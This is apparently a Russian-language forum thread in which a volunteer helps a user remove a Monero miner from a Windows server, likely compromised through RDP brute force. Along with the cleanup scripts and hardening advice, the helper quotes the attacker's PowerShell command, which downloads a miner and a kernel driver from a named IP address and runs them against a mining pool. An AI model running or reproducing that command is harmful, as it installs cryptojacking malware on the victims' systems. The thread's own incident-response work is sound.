Здравствуйте. Очень плохо работает система. Почти каждая программа работает с торможением.
В диспетчере задач процесс COM Surrogate грузит процессор на 95%.
Здравствуйте. Очень плохо работает система. Почти каждая программа работает с торможением.
В диспетчере задач процесс COM Surrogate грузит процессор на 95%.
Уважаемый(ая) W1nd, спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:Пожалуйста, перезагрузите сервер вручную.Код:begin TerminateProcessByName('c:\windows\temp\log.txt.exe'); QuarantineFile('C:\Windows\system32\network.exe', ''); QuarantineFile('c:\windows\temp\log.txt.exe', ''); DeleteFile('c:\windows\temp\log.txt.exe', ''); DeleteFile('c:\windows\temp\log.txt.exe', '64'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
WBR,
Vadim
Здравствуйте, карантин выслал, лог прикрепляю.
Майнер работает, но в автозагрузке его нет, запускается, похоже, вручную:Запускается от системы, удалять его можно, но проблему это не решит.Код:cmd.exe /C powershell.exe -C (New-Object System.Net.WebClient).DownloadFile('http://125.212.214.148:666/wao.exe','C:\windows\teMp\System.exe');(New-Object Net.WebClient).DownloadFile('http://125.212.214.148:666/WinRing0x64.sys', 'C:\Windows\temp\WinRing0x64.sys') && C:\Windows\temp\System.exe --donate-level 1 -o europe.randomx-hub.miningpoolhub.com:20580 -u hiddensec070.ww -a rx/0 --coin monero -B -l C:\ProgramData\log.txt && del C:\Windows\temp\System.exe
Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.Код:;uVS v4.11.3 [http://dsrt.dyndns.org:8888] ;Target OS: NTv10.0 v400c OFFSGNSAVE ; C:\WINDOWS\TEMP\SYSTEM.EXE rbl 569FCF95F3889CEFD87C1B425FA37B03 dirzooex %SystemRoot%\TEMP zoo %SystemRoot%\TEMP\SYSTEM.EXE addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7 chklst delvir deltmp czoo
В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Скорее всего, взломали по RDP.
Смените всем пользователям, у кого есть права входа по RDP, пароли, установите сложные.
Уберитеправа администратора у всех пользователей, кому они действительно не необходимы, при грамотной настройке прав всем они не нужны.
Учёткам Администратор/Administrator/Admin запретить удалённый доступ, для администрирования через терминал пользуйтесь другими, с
нетипичным, лучше не словарным (типа rdp1) именем и сложными паролями.
Включить защиту от буртфорса (подбора) паролей. Простейший вариант - через политики, блокировать учётку на N минут после 3-4 неудачных попыток входа. Есть более продвинутые варианты с использованием стороннего софта, например: Инструкция по защите RDP подключения, или возможностей маршрутизатора, для Mikrotik, в частности, есть множество изощрённых рецептов.
И зачем открыты множество портов наружу, включая 53-й, у вас сервер DNS на весь интернет раздаёт? ЗаDDOSят.
Эти так вообще только для хитрого взлома пригодятся:88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-01 11:30:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
WBR,
Vadim
Добрый день. Карантин выслал, лог прикрепляю.
Данную проблему решит только переустановка системы?
Вы меня либо не поняли, либо не читали рекомендации вообще. Переустановите систему, не не приняв мер против взлома - получите майнер снова через какое-то время.
Выполните скрипт в UVS:В папке с uVS появится новый архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.Код:;uVS v4.11.4 [http://dsrt.dyndns.org:8888] ;Target OS: NTv10.0 v400c OFFSGNSAVE dirzooex %SystemRoot%\TEMP adddir zoo %SystemRoot%\TEMP zoo %SystemRoot%\TEMP\SYSTEM.EXE addsgn A1BA20CF1DE779676D3051F9E97612258E75B47B0E62AC13853CF57B50E658BD23479466E5645401A84D7B77161649FA7C049C70A6193B3265F44AD3D6DDA865 8 Tool.BtcMine.2492 [DrWeb] 7 chklst delvir regt 27 czoo cexec wevtutil.exe epl System system.evtx cexec wevtutil.exe epl Application Application.evtx cexec wevtutil.exe epl Security Security.evtx cexec pack\7za.exe a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=64m Events.7z *.evtx apply
В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
В папке с UVS появится архив Events.7z, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.
WBR,
Vadim
Добрый день.
Ссылка на файл https://my-files.su/ib64on
Карантин выслал и лог прикрепляю
Пока всё по-прежнему, брутфориить по RDP можно до посинения. Смена порта ничего не даёт.
Настройте блокировку через болитики, или IPBan.
Скачайте по той же ссылке обновлённую версию UVS и сделайте новый полный образ автозапуска.
WBR,
Vadim
Здравствуйте, ссылка на лог https://my-files.su/dn5cim
Майнера нет.
Но RDP всё так же подвержен брутфорсу. IPBan отсутствует, насколько вижу.
Кстати в той инструкции ссылка на устаревшую версию и x86. Ставьте свежую x64 версию.
WBR,
Vadim
Свежую версию ipban поставил, все сделал согласно инструкции.
Теперь банит.
Только один вопрос остался: зачем всё это торчит наружу?53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-16 17:15:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49910/tcp open msrpc Microsoft Windows RPC
WBR,
Vadim
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
- =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 3
- =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 8
- =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
- c:\windows\system32\network.exe - VHO:Trojan.Win32.Miner.gen=
- c:\windows\temp\log.txt.exe - VHO:Trojan.Win32.Miner.gen=
- \system.exe._74948333fd5cced7e04dc67e68096b6437160 2a9 - VHO:Tr=
ojan.Win32.Miner.gen
Уважаемый(ая) W1nd, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.